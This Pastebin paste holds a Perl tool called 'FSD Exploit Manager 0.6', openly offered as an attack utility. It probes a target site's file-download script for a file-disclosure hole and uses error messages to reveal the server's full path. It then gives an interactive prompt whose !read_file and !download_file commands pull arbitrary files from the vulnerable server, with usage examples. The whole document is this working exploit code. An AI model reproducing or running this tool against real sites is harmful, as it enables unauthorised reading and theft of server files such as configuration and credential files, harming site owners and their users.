Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!usr/bin/perl
- #FSD Exploit Manager 0.6
- #(C) Doddy Hackman 2014
- use Getopt::Long;
- use Color::Output;
- Color::Output::Init;
- use LWP::UserAgent;
- use URI::Split qw(uri_split);
- use File::Basename;
- use Cwd;
- my $nave = LWP::UserAgent->new();
- $nave->agent( $agents[ rand @agents ] );
- $nave->timeout(5);
- installer();
- GetOptions(
- "scan=s" => \$scan,
- "fpd" => \$fpd,
- "logs" => \$logs,
- "open" => \$open
- );
- head();
- if ($scan) {
- my $page = $scan;
- printear("\n[+] Scanning target : ");
- print $page. "\n\n";
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
- my $me = basename($path);
- $code1 = toma( $page . $me );
- if ( $code1 =~ /header\((.*)Content-Disposition: attachment;/ig ) {
- printear_titulo("[+] Vulnerable\n");
- $code2 = toma( $page . "'" );
- if ( $code2 =~ /No such file or directory in <b>(.*)<\/b> on line/
- or $code2 =~
- /No existe el fichero o el directorio in <b>(.*)<\/b> on line/ )
- {
- my $ruta = $1;
- my $cambiar = basename($ruta);
- $ruta =~ s/$cambiar//;
- my $prompt = "";
- if ($fpd) {
- printear("\n[+] Full Path Dislocure Detect : ");
- print $ruta. "\n";
- $prompt = "[" . $ruta . "] > ";
- }
- else {
- $prompt = "[prompt] > ";
- }
- unless ( -d $auth ) {
- mkdir( $auth, "0777" );
- chmod 0777, $auth;
- }
- chdir($auth);
- printear("\n[+] File Downloader : ");
- print "Ready\n";
- while (1) {
- $SIG{INT} = \&adios;
- printear_titulo( "\n" . $prompt );
- chomp( my $comando = <stdin> );
- if ( $comando =~ /!exit/ ) {
- adios();
- }
- elsif ( $comando =~ /!read_file (.*)/ ) {
- my $archivo = $1;
- my $code = "";
- my $code = toma( $page . $archivo );
- printear_logo(
- "\n----------------------------------------------------\n"
- );
- printear_titulo($code);
- printear_logo(
- "\n----------------------------------------------------\n"
- );
- }
- elsif ( $comando =~ /!download_file (.*)/ ) {
- my $archivo = $1;
- my $nombre = basename($archivo);
- printear_titulo("\n[+] Downloading file : ");
- print $nombre. "\n";
- if ( $nave->mirror( $page . $archivo, $nombre ) ) {
- printear("\n[+] File Downloaded\n");
- if ($open) {
- my $abrir = getcwd() . "/" . $nombre;
- if ( -f $abrir ) {
- abrir_archivo($abrir);
- }
- if ( !defined($logs) ) {
- if ( -f $abrir ) {
- unlink($abrir);
- }
- }
- }
- }
- else {
- printear("\n[-] File not downloaded\n");
- }
- }
- elsif ( $comando =~ /!help/ ) {
- printear( "\n[+] Commands : " . "\n\n" );
- printear("!download_file <file> : Download file\n");
- printear("!read_file <file> : Read File\n");
- printear("!help : Show commands\n");
- printear("!exit : To exit the program\n");
- }
- else {
- printear("\n[-] Command not found , try using !help\n");
- }
- }
- }
- }
- else {
- printear_titulo("[-] Not vulnerable\n");
- }
- }
- else {
- sintax();
- }
- copyright();
- sub abrir_archivo {
- my $os = $^O;
- if ( $os =~ /Win32/ig ) {
- system(qq(notepad.exe "$_[0]"));
- }
- else {
- system(qq(gedit '$_[0]'));
- }
- }
- sub printear {
- cprint( "\x036" . $_[0] . "\x030" );
- }
- sub printear_logo {
- cprint( "\x037" . $_[0] . "\x030" );
- }
- sub printear_titulo {
- cprint( "\x0310" . $_[0] . "\x030" );
- }
- sub sintax {
- printear("\n[+] Sintax : ");
- print "perl $0 <option> <value>\n";
- printear("\n[+] Options : \n\n");
- print "-scan <page> : FSD Exploit Scanner\n";
- print "-fpd : Check Full Path Discloure\n";
- print "-logs : Enable logs to save files downloaded\n";
- print "-open : Enable open files downloaded\n";
- printear("\n[+] Example : ");
- print "perl fsd.pl -scan http://localhost/download.php?down= -fpd -logs\n";
- copyright();
- }
- sub installer {
- unless ( -d "fsdlogs/" ) {
- mkdir( "fsdlogs/", "777" );
- chmod 0777, "fsdlogs/";
- }
- chdir("fsdlogs");
- }
- sub adios {
- printear_titulo("\n\n[+] Good Bye\n");
- copyright();
- }
- sub head {
- printear_logo("\n-- == FSD Exploit Manager 0.6 == --\n\n");
- }
- sub copyright {
- printear_logo("\n\n-- == (C) Doddy Hackman 2014 == --\n");
- exit(1);
- }
- sub toma {
- return $nave->get( $_[0] )->content;
- }
- #The End ?
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement